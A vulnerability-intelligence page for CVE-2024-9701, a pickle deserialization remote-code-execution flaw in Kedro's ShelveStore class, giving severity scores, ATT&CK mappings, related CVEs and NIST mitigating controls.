Cyber Resilience

CVE-2024-9701

CriticalRCE

Published: 20 March 2025

Published
20 March 2025
Modified
15 April 2026
KEV Added
Patch
CVSS Score v3 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0614 91.0th percentile
Risk Priority 23 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-9701 is a critical-severity Deserialization of Untrusted Data (CWE-502) vulnerability. Its CVSS base score is 9.8 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 9.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-2 (Flaw Remediation).

Deeper analysis

A Remote Code Execution vulnerability tracked as CVE-2024-9701 affects the ShelveStore class in Kedro version 0.19.8. The class relies on Python's shelve module, which in turn uses pickle for serializing session data, enabling an attacker to achieve arbitrary code execution through deserialization of a malicious payload placed in the shelve file. The issue is classified under CWE-502 and carries a CVSS 3.0 score of 9.8.

An unauthenticated remote attacker can exploit the flaw by crafting and storing a malicious pickle-based payload in a shelve file used by ShelveStore. Upon deserialization, the payload executes arbitrary Python code, potentially resulting in full system compromise with impacts to confidentiality, integrity, and availability.

A fix is referenced in the Kedro project commit d79fa51de55ac0ccb58cce1a482df1b445f0fe7c, and further details are available via the associated huntr.com bounty report. The EPSS score has remained at modest levels with a current value of 0.0614 and a peak of 0.0762.

EU & UK References

Vulnerability details

A Remote Code Execution (RCE) vulnerability has been identified in the Kedro ShelveStore class (version 0.19.8). This vulnerability allows an attacker to execute arbitrary Python code via deserialization of malicious payloads, potentially leading to a full system compromise. The ShelveStore…

more

class uses Python's shelve module to manage session data, which relies on pickle for serialization. Crafting a malicious payload and storing it in the shelve file can lead to RCE when the payload is deserialized.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.006 Python Execution
Adversaries may abuse Python commands and scripts for execution.
Why these techniques?

RCE via Python pickle deserialization in ShelveStore directly enables exploitation of public-facing apps (T1190) and arbitrary Python code execution (T1059.006).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-26220Shared CWE-502
CVE-2026-31234Shared CWE-502
CVE-2026-31072Shared CWE-502
CVE-2025-27780Shared CWE-502
CVE-2025-50460Shared CWE-502
CVE-2025-27779Shared CWE-502
CVE-2025-27781Shared CWE-502
CVE-2025-62373Shared CWE-502
CVE-2025-24016Shared CWE-502
CVE-2026-31237Shared CWE-502

Affected Assets

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires timely identification, reporting, and patching of the deserialization flaw in Kedro ShelveStore (version 0.19.8), directly preventing RCE exploitation as per the provided mitigation commit.

prevent

Enforces approved access authorizations to shelve files, preventing attackers from writing malicious payloads required for deserialization-based RCE.

prevent

Validates session data inputs prior to serialization into shelve files, mitigating injection of malicious deserialization payloads but not fully addressing unsafe pickle deserialization.

References